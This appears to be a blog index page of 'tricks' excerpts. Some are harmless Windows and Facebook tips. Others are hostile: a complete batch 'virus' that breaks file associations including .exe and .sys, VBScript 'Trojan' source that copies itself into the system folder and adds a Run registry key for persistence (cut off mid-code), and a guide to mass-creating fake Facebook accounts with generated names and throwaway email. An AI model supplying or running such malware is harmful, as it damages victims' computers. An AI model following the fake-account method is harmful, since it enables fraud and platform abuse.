Posts

Showing posts with the label Tricks

How to Remove Write Protection For a USB Drive

Image
How to Remove Write Protection For a USB Drive Well today,let's see how to remove write protection from USB or pendrive.When enabled,  write protection  is a setting that blocks any sort of modification or deletion of a file on a disc. If you are experiencing an issue when attempting to copy or delete files on a USB flash drive, there is a very simple solution that will allow you to remove this setting, giving you the capability to modify, copy, or delete any files from your USB drive.  How To Remove Write Protection on a USB To remove the write protection, simply open your  Start  menu, and click on  Run . Type in  regedit  and press Enter . This will open the registry editor.  The next step is to navigate to the following path:  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies Double-click the  WriteProtect  key located in the right side pane and set the value to  0 . Go to the  Dat...

REMOVE TIMELINE FEATURE FROM YOUR FACEBOOK PROFILE

Image
REMOVE TIMELINE FEATURE FROM YOUR FACEBOOK PROFILE In this post we are gonna show you an easy tutorial for you to deactivate, disable and remove the Facebook Timeline. You probably know that there is no way to disable the Facebook Timeline through the Facebook. If you activated the Timeline and want to remove it, you must install a plugin called TimeLine Remove. This program is compatible with Mozilla Firefox and Google Chrome, it still in development for Safari and Internet  Explorer.So , here we go, see how to disable and deactivate the Timeline from your Facebook profile, and get your old Facebook layout back. 1- DOWNLOAD – SELECT YOUR BROWSER (VERSION 0.5)      2- Download and install your web browser add-on by clicking  this link 3- After Installation,Simply Click on the add-on and then click on “Status: Timeline Remove” to activate and deactivate timeline. 4- Bingo!! You are done.  Join this blog for more updates.

TRICK TO CREATE UNLIMITED VERIFIED FACEBOOK ACCOUNTS

TRICK TO CREATE UNLIMITED VERIFIED FACEBOOK ACCOUNTS Lets Start Creating Unlimited FB Accounts Step 1: Firstly, go to  http://m.facebook.com  and then click “Create New Account” Step 2: Fill the complete form ( use  http://fakenamegenerator.com/ ) In the section of “Email or Phone” use email from  http://10minutemail.com/ Step 3: Press “Sign up” and then visit  http://10minutemail.com/  to get email verification from Facebook(Press F5 until you see it) use that CODE to activate your account. NOTE:  Your Account may get banned in a day, so do make sure that you are providing the proper identity(college, school, place of living…) and don’t forget to upload a profile picture to keep the life of your account longer. DISCLAIMER:  We’ll not be responsible for the use or misuse of this information. So use it at your own risk.

HOW TO TRACK WHO VIEWS YOUR FACEBOOK PROFILE

HOW TO TRACK WHO VIEWS YOUR FACEBOOK PROFILE Why can’t I see who is stalking my Facebook profile? There are other social networks that do let you see who’s viewed your profile, mainly LinkedIn and its “Who’s Viewed Your Profile” feature. Regular users can see a recent list of who has been spying on you, along with some basic analytics, while paid users can see up to 90 days worth of viewers, as well as more detailed analytics. It’s great for seeing potential job interest and company prospects. And what’s better than finding a hot girl that has a great job? Finding one that viewed your profile. So, why doesn’t Facebook jump on board? How great would it be to know when a girl you just friended viewed your profile and photos? It would be pretty clutch. While there isn’t a built-in feature to see who exactly has checked you out, you still might be able to get some information on how often your Facebook friends are viewing your profile. Can You Use Facebook’s “InitialChatFrie...

HOW TO MAKE EXTENSION CHANGER VIRUS USING NOTEPAD

Image
HOW TO MAKE EXTENSION CHANGER VIRUS USING NOTEPAD In this article i am gonna show you how to make a virus that changes extension of  files.Even  though it is not a harmful virus it will change all the files extension and makes it unuseful for the user and he has to again change the files extension to its orginal one. What is Extension changer ? Assume that all images (*.jpeg, Gif etc) are by default opening with “Windows Picture and Fax Viewer” but in with this virus,this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application. HOW TO MAKE EXTENSION CHANGER VIRUS 1. Open a Notepad and copy and paste the below code @echo off assoc .txt=jpegfile assoc .exe=htmlfile assoc .jpeg=avifile assoc .png=mpegfile assoc .mpeg=txtfile assoc .sys=regfile msg Your System is cracked ….. exit Save it as  anyname.bat , and now your virus file is re...

NEW WAY TO BLOCK WEBSITES WITH VIRUS

Image
NEW WAY TO BLOCK WEBSITES WITH VIRUS Most of us are familiar with the virus that used to block Orkut and Youtube websites. If you are curious about creating such a virus on your own, here is how it can be done. As usual I am using my favorite programming language  ‘C’  to create this  website blocking virus . I will give a brief introduction about this virus before I jump into the technical jargon. This virus has been exclusively created in  ‘C’ . So, anyone with a basic knowledge of ‘C’ will be able to understand the working of this virus program. When this program is executed, it will block all those websites that are listed in the source code. In the following example, the sites that are listed in the source code are Google, Yahoo and Youtube. When you download the source code of this program, you have a choice to include your own list of sites that you want this virus to block. I have just removed the source code of this program from this post as it ...

HOW TO REMOVE HIDDEN SHORTCUT VIRUS FROM REMOVABLE MEDIA

Image
HOW TO REMOVE HIDDEN SHORTCUT VIRUS FROM REMOVABLE MEDIA If your Pen Drive is infected with any of the following viruses: *  Autorun.inf *  new  folder.exe *  Iexplorer.vbs *  Bha.vbs *  nfo.exe *  New_Folder.exe *  ravmon.exe *  RVHost.exe  or any other files with extension. Actually this viruses are hidden and can’t be seen even after you enable show hidden folders. Following simple dos command will change the attributes of these files ,there after you can remove it by pressing delete key. Follow these steps: Step1.:Type cmd in Run Step2.: Switch to the drive on which pen drive is connected (like C:\> h: enter ) Step3.: type exactly as : attrib -s -h *.* /s /d and hit enter (don’t forget spaces). Now you can see hidden virus files and you can delete them.

HOW TO MAKE TROJAN VIRUS USING NOTEPAD

Image
HOW TO MAKE TROJAN VIRUS USING NOTEPAD Note the following copy all the source into notepad save as  .vbs  (if you want to activate) if not let it remain in the file  exstensi.txt exampels: ippamd0_trojanHorse.VBS Copy all the source below: brakes – dlRB “DL Reboot” Trojan script by D.L. On Error Resume Next FSobj dim, sysDir, generateCopy, newfile, fixedCode, procreateCopy, fileData set FSobj = CreateObject (“Scripting.FileSystemObject”) set sysDir = FSobj.GetSpecialFolder (1) createRegKey “HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ dlRB”, sysDir & “\  dlRB.vbs ” sub createRegKey (regkey, regVal) set regedit = CreateObject (“ WScript.Shell ”) regEdit.RegWrite regkey, regVal end sub set generateCopy = FSobj.CreateTextFile (sysDir + “\  dlRB.vbs ”) generateCopy.close set newfile = FSobj.OpenTextFile (WScript.ScriptFullname, 1) setFile () fixedCode = replace (fileData, chr (94),...

Change Your Ip In Less Then 1 Minute

Image
Change Your Ip In Less Then 1 Minute                           In my previous post i had show you how to  Grab someone ip address  now i will show you how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute. Click on " Start " in the bottom left corner of the screen. Click on " RUN " Type in " command " and click OK        You should be now at MSDOS prompt Screen Type " ipconfig /release " just like that, and press " enter " Type " exit " and leave the prompt Right-click on " Network Places " or " My Network Places " on your desktop. Click on " properties "       Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.  Right click on " Local A...

Finding Ip Address Of A Website Using Command Prompt Or CMD

Image
Finding Ip Address Of A Website Using Command Prompt Or CMD In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started. How to find IP ? 1. Go to  Start  > Type   CMD  and press Enter. 2. Now write  Ping  followed by website URL whose IP you want to find. 3. It will take less then a second and come up with the results as shown below. In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.